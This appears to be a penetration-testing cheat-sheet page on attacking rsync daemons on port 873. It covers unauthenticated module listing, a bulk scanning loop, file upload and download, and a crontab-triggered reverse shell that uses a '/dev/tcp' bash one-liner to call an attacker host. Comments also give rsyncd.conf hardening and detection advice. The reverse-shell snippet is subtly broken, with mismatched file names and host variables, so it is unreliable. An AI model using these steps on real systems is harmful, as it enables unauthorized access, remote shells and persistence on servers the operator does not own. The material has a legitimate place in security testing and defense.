873 - Rsync
Potential Risks
Unauthorized Access
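# RHOST=remoteHost; RPORT=873
# Ask the daemon for its module list without supplying credentials.
# A module list in the output means the listing is open to unauthenticated
# clients. On the server this is controlled in rsyncd.conf: `list = no` hides
# a module from the listing, `auth users` with `secrets file` requires
# credentials, and `hosts allow` restricts which clients may connect.
# The URL scheme is rsync:// and the expansion is quoted so the host and port
# are passed as a single argument.
rsync "rsync://${RHOST}:${RPORT}"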
# Bulk testing
# RHOST_LIST=hosts.txt
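#######################################
# Checks every rsync daemon named in "$RHOST_LIST" for a module listing that
# is served without credentials, and reports the daemons that answer.
# Globals:   RHOST_LIST (read)      - file with one "host" or "host:port" per line
#            LINE, RHOST, RPORT (written) - overwritten for each line processed
# Outputs:   "[SUCCESS] rsync://host:port" on stdout for each daemon whose
#            listing output is non-empty
# Returns:   non-zero if the list file cannot be opened
#
# A hit means the daemon answers module-list requests from unauthenticated
# clients; rsyncd.conf governs this with `list`, `auth users` / `secrets file`
# and `hosts allow`.
#######################################
run() {
  # `|| [[ -n "$LINE" ]]` keeps a final line that has no trailing newline.
  while IFS= read -r LINE || [[ -n "$LINE" ]]; do
    # A blank line names no host; skip it instead of probing "rsync://:873".
    [[ -n "$LINE" ]] || continue

    if [[ "$LINE" == *":"* ]]; then
      RHOST=${LINE%%:*}
      RPORT=${LINE#*:}
    else
      RHOST=$LINE
      RPORT=873 # default rsync daemon port
    fi

    # sshpass is given an empty password, presumably so a password prompt
    # cannot stall the loop; stderr is dropped so only listing output counts.
    # The URL is quoted to keep it a single argument.
    if [[ -n "$(sshpass -p '' rsync "rsync://${RHOST}:${RPORT}" 2>/dev/null)" ]]; then
      printf '%s\n' "[SUCCESS] rsync://${RHOST}:${RPORT}"
    fi
  done < "$RHOST_LIST"
}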
# Reduce each "[SUCCESS] rsync://host:port" line to its "host:port" part by
# splitting on "//" and printing the second field.
run | awk 'BEGIN { FS = "//" } { print $2 }'
Exploitation
Upload File
Method 1: Regular upload files
# RHOST=remoteHost; RPORT=873
# Copies a local file to the daemon (-a archive mode, -v verbose). In an
# rsync:// URL the first path component after the port is the module name.
# The transfer is accepted only by a module that permits writes; rsyncd.conf
# modules are read-only unless `read only = no` is set, and `auth users` with
# `secrets file` plus `hosts allow` limit who can write at all.
rsync -av /path/to/localFile rsync://$RHOST:$RPORT/path/to/remoteFile
Method 2: Upload crontab to reverse shell
# RHOST=remoteHost; RPORT=873
# EHOST=evilHost; EPORT=6789
# Method 1: Modify the `crontab` of the remote server
# Step 1: Download the `crontab` of the remote server
# Step 2: Added reverse shell task
# Step 3: Upload the evil 'crontab'
# Method 2: Added the `crontab` of the remote server
# Step 1: Create evil `crontab`
# Step 2: Upload the evil 'crontab'
For more information, please refer to page OOB > Reverse Shell.
Method 3: Upload the executable reverse shell file and add crontab to execute
# RHOST=remoteHost; RPORT=873
# EHOST=evilHost; EPORT=6789
# Preconditions, per the step comments below: a module (named `src` in the
# upload URL) that accepts writes, apparently rooted high enough that both
# tmp/ and the crontab are reachable through it, and a daemon account that is
# allowed to modify cron files.
# Hardening in rsyncd.conf: keep `read only = yes`, point `path` at a narrow
# directory, set `use chroot = yes`, run under a non-root `uid`/`gid`, and
# require `auth users` + `secrets file` together with `hosts allow`.
# Detection: enable `log file` and `transfer logging` to record writes, put
# crontab files and /etc/cron* under file-integrity monitoring, and alert on
# outbound connections opened by shells that cron started.
# Step 1: Create a reverse shell script and add executable permissions
echo "#\!/bin/bash\n/bin/bash -i >& /dev/tcp/$LHOST/$LPORT 0>&1" > /tmp/santa_revs.sh
chmod +x /tmp/santaclaus_revs.sh
# Step 2: Upload reverse shell script
rsync -av /tmp/santaclaus_revs.sh rsync://$RHOST:$RPORT/src/tmp/santaclaus_revs.sh
# Step 3: Download and modify the target server crontab
# Step 4: Upload evil crontab
For more information, please refer to page OOB > Reverse Shell.
Download File
# RHOST=remoteHost; RPORT=873
# Copies a file from the daemon to a local path (-a archive mode, -v verbose).
# In an rsync:// URL the first path component after the port is the module
# name. A module readable without credentials exposes everything under its
# `path`; `auth users` with `secrets file`, `hosts allow` and a narrowly
# scoped `path` in rsyncd.conf bound what can be read.
rsync -av rsync://$RHOST:$RPORT/path/to/remoteFile /path/to/localFile